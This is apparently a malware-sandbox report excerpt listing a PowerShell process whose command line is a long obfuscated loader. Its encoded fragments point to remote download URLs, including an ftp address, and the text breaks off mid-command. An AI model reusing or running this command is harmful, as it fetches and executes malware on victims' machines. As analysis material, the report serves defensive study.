                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                General

                                Target ID:2
                                Start time:03:28:03
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$qKKzc = 'OwB9' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'EQ' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'EQ' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + 'BY' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'VQB1' + [char]65 + 'Gg' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Gg' + [char]65 + 'd' + [char]65 + 'B0' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cw' + [char]65 + '6' + [char]65 + 'C8' + [char]65 + 'LwB3' + [char]65 + 'Hc' + [char]65 + 'dw' + [char]65 + 'u' + [char]65 + 'Gc' + [char]65 + 'cgBh' + [char]65 + 'HQ' + [char]65 + 'aQB0' + [char]65 + 'HU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HM' + [char]65 + 'ZQBl' + [char]65 + 'Gs' + [char]65 + 'ZQBy' + [char]65 + 'HM' + [char]65 + 'LgBj' + [char]65 + 'G8' + [char]65 + 'bQ' + [char]65 + 'v' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + '' + [char]65 + 't' + [char]65 + 'Gk' + [char]65 + 'bgBj' + [char]65 + 'Gw' + [char]65 + 'dQBk' + [char]65 + 'GU' + [char]65 + 'cw' + [char]65 + 'v' + [char]65 + 'GM' + [char]65 + 'dQBz' + [char]65 + 'HQ' + [char]65 + 'bwBt' + [char]65 + 'Gk' + [char]65 + 'egBl' + [char]65 + 'C8' + [char]65 + 'YwBz' + [char]65 + 'HM' + [char]65 + 'LwBi' + [char]65 + 'GQ' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBv' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'b' + [char]65 + 'Bs' + [char]65 + 'HU' + [char]65 + 'bg' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gs' + [char]65 + 'bwB2' + [char]65 + 'G4' + [char]65 + 'SQ' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'Ek' + [char]65 + 'VgBG' + [char]65 + 'HI' + [char]65 + 'c' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bk' + [char]65 + 'G8' + [char]65 + 'a' + [char]65 + 'B0' + [char]65 + 'GU' + [char]65 + 'TQB0' + [char]65 + 'GU' + [char]65 + 'Rw' + [char]65 + 'u' + [char]65 + 'Ck' + [char]65 + 'Jw' + [char]65 + 'x' + [char]65 + 'HM' + [char]65 + 'cwBh' + [char]65 + 'Gw' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'DM' + [char]65 + 'eQBy' + [char]65 + 'GE' + [char]65 + 'cgBi' + [char]65 + 'Gk' + [char]65 + 'T' + [char]65 + 'Bz' + [char]65 + 'HM' + [char]65 + 'YQBs' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'FQ' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Ec' + [char]65 + 'Lg' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'WgBj' + [char]65 + 'EI' + [char]65 + 'YwBh' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Ew' + [char]65 + 'LgBu' + [char]65 + 'Gk' + [char]65 + 'YQBt' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + 'B0' + [char]65 + 'G4' + [char]65 + 'ZQBy' + [char]65 + 'HI' + [char]65 + 'dQBD' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'G4' + [char]65 + 'aQBh' + [char]65 + 'G0' + [char]65 + 'bwBE' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'BB' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwBB' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 's' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'JwCTITo' + [char]65 + 'kyEn' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'YQBs' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBS' + [char]65 + 'C4' + [char]65 + 'ZwBT' + [char]65 + 'Ho' + [char]65 + 'QwBC' + [char]65 + 'Gw' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cg' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'cgB0' + [char]65 + 'FM' + [char]65 + 'N' + [char]65 + '' + [char]65 + '2' + [char]65 + 'GU' + [char]65 + 'cwBh' + [char]65 + 'EI' + [char]65 + 'bQBv' + [char]65 + 'HI' + [char]65 + 'Rg' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQB0' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'G4' + [char]65 + 'bwBD' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Ba' + [char]65 + 'GM' + [char]65 + 'QgBj' + [char]65 + 'GE' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'F0' + [char]65 + 'XQBb' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'B5' + [char]65 + 'EI' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'Cc' + [char]65 + 'JQBJ' + [char]65 + 'Gg' + [char]65 + 'cQBS' + [char]65 + 'Fg' + [char]65 + 'JQ' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fg' + [char]65 + 'U' + [char]65 + 'BV' + [char]65 + 'HU' + [char]65 + 'a' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + '4' + [char]65 + 'EY' + [char]65 + 'V' + [char]65 + 'BV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'Bl' + [char]65 + 'FQ' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gc' + [char]65 + 'bgBp' + [char]65 + 'GQ' + [char]65 + 'bwBj' + [char]65 + 'G4' + [char]65 + 'RQ' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQB0' + [char]65 + 'G4' + [char]65 + 'ZQBp' + [char]65 + 'Gw' + [char]65 + 'QwBi' + [char]65 + 'GU' + [char]65 + 'Vw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bj' + [char]65 + 'GU' + [char]65 + 'agBi' + [char]65 + 'E8' + [char]65 + 'LQB3' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'o' + [char]65 + 'GU' + [char]65 + 'cwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'cwBp' + [char]65 + 'GQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'HQ' + [char]65 + 'e' + [char]65 + 'B0' + [char]65 + 'C4' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'Ew' + [char]65 + 'T' + [char]65 + 'BE' + [char]65 + 'C8' + [char]65 + 'MQ' + [char]65 + 'w' + [char]65 + 'C8' + [char]65 + 'cgBl' + [char]65 + 'HQ' + [char]65 + 'c' + [char]65 + 'B5' + [char]65 + 'HI' + [char]65 + 'YwBw' + [char]65 + 'FU' + [char]65 + 'LwBy' + [char]65 + 'GI' + [char]65 + 'LgBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'YQBy' + [char]65 + 'GI' + [char]65 + 'dgBr' + [char]65 + 'GM' + [char]65 + 'cwBl' + [char]65 + 'GQ' + [char]65 + 'LgBw' + [char]65 + 'HQ' + [char]65 + 'ZgB' + [char]65 + '' + [char]65 + 'DE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'HI' + [char]65 + 'YgB2' + [char]65 + 'Gs' + [char]65 + 'YwBz' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + '' + [char]65 + 'v' + [char]65 + 'C8' + [char]65 + 'OgBw' + [char]65 + 'HQ' + [char]65 + 'Zg' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBy' + [char]65 + 'HQ' + [char]65 + 'UwBk' + [char]65 + 'GE' + [char]65 + 'bwBs' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'EQ' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'FM' + [char]65 + 'egBD' + [char]65 + 'EI' + [char]65 + 'b' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'E' + [char]65 + '' + [char]65 + 'Q' + [char]65 + 'Bw' + [char]65 + 'Eo' + [char]65 + 'O' + [char]65 + '' + [char]65 + '3' + [char]65 + 'DU' + [char]65 + 'MQ' + [char]65 + 'y' + [char]65 + 'G8' + [char]65 + 'cgBw' + [char]65 + 'HI' + [char]65 + 'ZQBw' + [char]65 + 'G8' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'HY' + [char]65 + 'ZQBk' + [char]65 + 'Cc' + [char]65 + 'L' + [char]65 + '' + [char]65 + 'p' + [char]65 + 'Ck' + [char]65 + 'OQ' + [char]65 + '0' + [char]65 + 'Cw' + [char]65 + 'Ng' + [char]65 + 'x' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '3' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '0' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'OQ' + [char]65 + 's' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'Nw' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'L' + [char]65 + '' + [char]65 + '5' + [char]65 + 'Dk' + [char]65 + 'L' + [char]65 + '' + [char]65 + '1' + [char]65 + 'DE' + [char]65 + 'MQ' + [char]65 + 's' + [char]65 + 'DE' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'x' + [char]65 + 'Cw' + [char]65 + 'M' + [char]65 + '' + [char]65 + 'w' + [char]65 + 'DE' + [char]65 + 'K' + [char]65 + 'Bd' + [char]65 + 'F0' + [char]65 + 'WwBy' + [char]65 + 'GE' + [char]65 + 'a' + [char]65 + 'Bj' + [char]65 + 'Fs' + [char]65 + 'I' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBq' + [char]65 + 'C0' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'o' + [char]65 + 'Gw' + [char]65 + 'YQBp' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'GQ' + [char]65 + 'ZQBy' + [char]65 + 'EM' + [char]65 + 'awBy' + [char]65 + 'G8' + [char]65 + 'dwB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'GM' + [char]65 + 'ZQBq' + [char]65 + 'GI' + [char]65 + 'bw' + [char]65 + 't' + [char]65 + 'Hc' + [char]65 + 'ZQBu' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'HM' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'Z' + [char]65 + 'Bl' + [char]65 + 'HI' + [char]65 + 'Qw' + [char]65 + 'u' + [char]65 + 'GY' + [char]65 + 'cQBk' + [char]65 + 'Go' + [char]65 + 'bQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgB0' + [char]65 + 'Hg' + [char]65 + 'ZQBU' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bn' + [char]65 + 'G4' + [char]65 + 'aQBk' + [char]65 + 'G8' + [char]65 + 'YwBu' + [char]65 + 'EU' + [char]65 + 'LgBm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'GU' + [char]65 + 'aQBs' + [char]65 + 'EM' + [char]65 + 'YgBl' + [char]65 + 'Fc' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'g' + [char]65 + 'HQ' + [char]65 + 'YwBl' + [char]65 + 'Go' + [char]65 + 'YgBP' + [char]65 + 'C0' + [char]65 + 'dwBl' + [char]65 + 'E4' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'Bm' + [char]65 + 'HE' + [char]65 + 'Z' + [char]65 + 'Bq' + [char]65 + 'G0' + [char]65 + 'J' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Gc' + [char]65 + 'UwB6' + [char]65 + 'EM' + [char]65 + 'QgBs' + [char]65 + 'CQ' + [char]65 + 'Ow' + [char]65 + 'y' + [char]65 + 'DE' + [char]65 + 'cwBs' + [char]65 + 'FQ' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'ZQBw' + [char]65 + 'Hk' + [char]65 + 'V' + [char]65 + 'Bs' + [char]65 + 'G8' + [char]65 + 'YwBv' + [char]65 + 'HQ' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'eQB0' + [char]65 + 'Gk' + [char]65 + 'cgB1' + [char]65 + 'GM' + [char]65 + 'ZQBT' + [char]65 + 'C4' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'E4' + [char]65 + 'LgBt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'Hk' + [char]65 + 'UwBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Gw' + [char]65 + 'bwBj' + [char]65 + 'G8' + [char]65 + 'd' + [char]65 + 'Bv' + [char]65 + 'HI' + [char]65 + 'U' + [char]65 + 'B5' + [char]65 + 'HQ' + [char]65 + 'aQBy' + [char]65 + 'HU' + [char]65 + 'YwBl' + [char]65 + 'FM' + [char]65 + 'Og' + [char]65 + '6' + [char]65 + 'F0' + [char]65 + 'cgBl' + [char]65 + 'Gc' + [char]65 + 'YQBu' + [char]65 + 'GE' + [char]65 + 'TQB0' + [char]65 + 'G4' + [char]65 + 'aQBv' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'ZQBj' + [char]65 + 'Gk' + [char]65 + 'dgBy' + [char]65 + 'GU' + [char]65 + 'Uw' + [char]65 + 'u' + [char]65 + 'HQ' + [char]65 + 'ZQBO' + [char]65 + 'C4' + [char]65 + 'bQBl' + [char]65 + 'HQ' + [char]65 + 'cwB5' + [char]65 + 'FM' + [char]65 + 'Ww' + [char]65 + '7' + [char]65 + 'H0' + [char]65 + 'ZQB1' + [char]65 + 'HI' + [char]65 + 'd' + [char]65 + '' + [char]65 + 'k' + [char]65 + 'Hs' + [char]65 + 'I' + [char]65 + '' + [char]65 + '9' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'awBj' + [char]65 + 'GE' + [char]65 + 'YgBs' + [char]65 + 'Gw' + [char]65 + 'YQBD' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBk' + [char]65 + 'Gk' + [char]65 + 'b' + [char]65 + 'Bh' + [char]65 + 'FY' + [char]65 + 'ZQB0' + [char]65 + 'GE' + [char]65 + 'YwBp' + [char]65 + 'GY' + [char]65 + 'aQB0' + [char]65 + 'HI' + [char]65 + 'ZQBD' + [char]65 + 'HI' + [char]65 + 'ZQB2' + [char]65 + 'HI' + [char]65 + 'ZQBT' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HI' + [char]65 + 'ZQBn' + [char]65 + 'GE' + [char]65 + 'bgBh' + [char]65 + 'E0' + [char]65 + 'd' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'bwBQ' + [char]65 + 'GU' + [char]65 + 'YwBp' + [char]65 + 'HY' + [char]65 + 'cgBl' + [char]65 + 'FM' + [char]65 + 'LgB0' + [char]65 + 'GU' + [char]65 + 'Tg' + [char]65 + 'u' + [char]65 + 'G0' + [char]65 + 'ZQB0' + [char]65 + 'HM' + [char]65 + 'eQBT' + [char]65 + 'Fs' + [char]65 + 'ew' + [char]65 + 'g' + [char]65 + 'GU' + [char]65 + 'cwBs' + [char]65 + 'GU' + [char]65 + 'fQ' + [char]65 + 'g' + [char]65 + 'GY' + [char]65 + 'Lw' + [char]65 + 'g' + [char]65 + 'D' + [char]65 + '' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'By' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'dwBv' + [char]65 + 'GQ' + [char]65 + 'd' + [char]65 + 'B1' + [char]65 + 'Gg' + [char]65 + 'cw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'Jw' + [char]65 + 'w' + [char]65 + 'Dg' + [char]65 + 'MQ' + [char]65 + 'g' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'ZQBl' + [char]65 + 'Gw' + [char]65 + 'cw' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'GE' + [char]65 + 'bQBt' + [char]65 + 'G8' + [char]65 + 'Yw' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQB4' + [char]65 + 'GU' + [char]65 + 'LgBs' + [char]65 + 'Gw' + [char]65 + 'ZQBo' + [char]65 + 'HM' + [char]65 + 'cgBl' + [char]65 + 'Hc' + [char]65 + 'bwBw' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'GM' + [char]65 + 'cgBv' + [char]65 + 'GY' + [char]65 + 'LQ' + [char]65 + 'g' + [char]65 + 'Ck' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'dQB0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'FM' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'G0' + [char]65 + 'YQBy' + [char]65 + 'Gc' + [char]65 + 'bwBy' + [char]65 + 'F' + [char]65 + '' + [char]65 + 'X' + [char]65 + 'B1' + [char]65 + 'G4' + [char]65 + 'ZQBN' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'By' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'BT' + [char]65 + 'Fw' + [char]65 + 'cwB3' + [char]65 + 'G8' + [char]65 + 'Z' + [char]65 + 'Bu' + [char]65 + 'Gk' + [char]65 + 'VwBc' + [char]65 + 'HQ' + [char]65 + 'ZgBv' + [char]65 + 'HM' + [char]65 + 'bwBy' + [char]65 + 'GM' + [char]65 + 'aQBN' + [char]65 + 'Fw' + [char]65 + 'ZwBu' + [char]65 + 'Gk' + [char]65 + 'bQBh' + [char]65 + 'G8' + [char]65 + 'UgBc' + [char]65 + 'GE' + [char]65 + 'd' + [char]65 + 'Bh' + [char]65 + 'EQ' + [char]65 + 'c' + [char]65 + 'Bw' + [char]65 + 'EE' + [char]65 + 'X' + [char]65 + '' + [char]65 + 'n' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'G4' + [char]65 + 'bwBp' + [char]65 + 'HQ' + [char]65 + 'YQBu' + [char]65 + 'Gk' + [char]65 + 'd' + [char]65 + 'Bz' + [char]65 + 'GU' + [char]65 + 'R' + [char]65 + '' + [char]65 + 't' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Jw' + [char]65 + 'l' + [char]65 + 'Ek' + [char]65 + 'a' + [char]65 + 'Bx' + [char]65 + 'FI' + [char]65 + 'W' + [char]65 + '' + [char]65 + 'l' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + 'Bt' + [char]65 + 'GU' + [char]65 + 'd' + [char]65 + 'BJ' + [char]65 + 'C0' + [char]65 + 'eQBw' + [char]65 + 'G8' + [char]65 + 'Qw' + [char]65 + 'g' + [char]65 + 'Ds' + [char]65 + 'I' + [char]65 + 'B0' + [char]65 + 'HI' + [char]65 + 'YQB0' + [char]65 + 'HM' + [char]65 + 'ZQBy' + [char]65 + 'G8' + [char]65 + 'bg' + [char]65 + 'v' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'd' + [char]65 + 'Bl' + [char]65 + 'Gk' + [char]65 + 'dQBx' + [char]65 + 'C8' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'GE' + [char]65 + 'cwB1' + [char]65 + 'Hc' + [char]65 + 'I' + [char]65 + 'Bl' + [char]65 + 'Hg' + [char]65 + 'ZQ' + [char]65 + 'u' + [char]65 + 'Gw' + [char]65 + 'b' + [char]65 + 'Bl' + [char]65 + 'Gg' + [char]65 + 'cwBy' + [char]65 + 'GU' + [char]65 + 'dwBv' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'I' + [char]65 + '' + [char]65 + '7' + [char]65 + 'Ck' + [char]65 + 'JwB1' + [char]65 + 'HM' + [char]65 + 'bQ' + [char]65 + 'u' + [char]65 + 'G4' + [char]65 + 'aQB3' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'VQBc' + [char]65 + 'Cc' + [char]65 + 'I' + [char]65 + '' + [char]65 + 'r' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'V' + [char]65 + 'By' + [char]65 + 'Eg' + [char]65 + 'VgB1' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'D0' + [char]65 + 'I' + [char]65 + 'BH' + [char]65 + 'GM' + [char]65 + 'VwBp' + [char]65 + 'FI' + [char]65 + 'Ow' + [char]65 + 'p' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'ZQBt' + [char]65 + 'GE' + [char]65 + 'TgBy' + [char]65 + 'GU' + [char]65 + 'cwBV' + [char]65 + 'Do' + [char]65 + 'OgBd' + [char]65 + 'HQ' + [char]65 + 'bgBl' + [char]65 + 'G0' + [char]65 + 'bgBv' + [char]65 + 'HI' + [char]65 + 'aQB2' + [char]65 + 'G4' + [char]65 + 'RQBb' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'Kw' + [char]65 + 'g' + [char]65 + 'Cc' + [char]65 + 'X' + [char]65 + 'Bz' + [char]65 + 'HI' + [char]65 + 'ZQBz' + [char]65 + 'FU' + [char]65 + 'X' + [char]65 + '' + [char]65 + '6' + [char]65 + 'EM' + [char]65 + 'Jw' + [char]65 + 'o' + [char]65 + 'C' + [char]65 + '' + [char]65 + 'PQ' + [char]65 + 'g' + [char]65 + 'Fo' + [char]65 + 'SwBu' + [char]65 + 'Fk' + [char]65 + 'TQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'KQ' + [char]65 + 'n' + [char]65 + 'HU' + [char]65 + 'cwBt' + [char]65 + 'C4' + [char]65 + 'bgBp' + [char]65 + 'Hc' + [char]65 + 'c' + [char]65 + 'BV' + [char]65 + 'Fw' + [char]65 + 'Jw' + [char]65 + 'g' + [char]65 + 'Cs' + [char]65 + 'I' + [char]65 + 'BU' + [char]65 + 'HI' + [char]65 + 'S' + [char]65 + 'BW' + [char]65 + 'HU' + [char]65 + 'J' + [char]65 + '' + [char]65 + 'g' + [char]65 + 'Cw' + [char]65 + 'QgBL' + [char]65 + 'Ew' + [char]65 + 'UgBV' + [char]65 + 'CQ' + [char]65 + 'K' + [char]65 + 'Bl' + [char]65 + 'Gw' + [char]65 + 'aQBG' + [char]65 + 'GQ' + [char]65 + 'YQBv' + [char]65 + 'Gw' + [char]65 + 'bgB3' + [char]65 + 'G8' + [char]65 + 'R' + [char]65 + '' + [char]65 + 'u' + [char]65 + 'H' + [char]65 + '' + [char]65 + 'c' + [char]65 + 'Bl' + [char]65 + 'GY' + [char]65 + 'eQ' + [char]65 + 'k' + [char]65 + 'Ds' + [char]65 + 'O' + [char]65 + 'BG' + [char]65 + 'FQ' + [char]65 + 'VQ' + [char]65 + '6' + [char]65 + 'Do' + [char]65 + 'XQBn' + [char]65 + 'G4' + [char]65 + 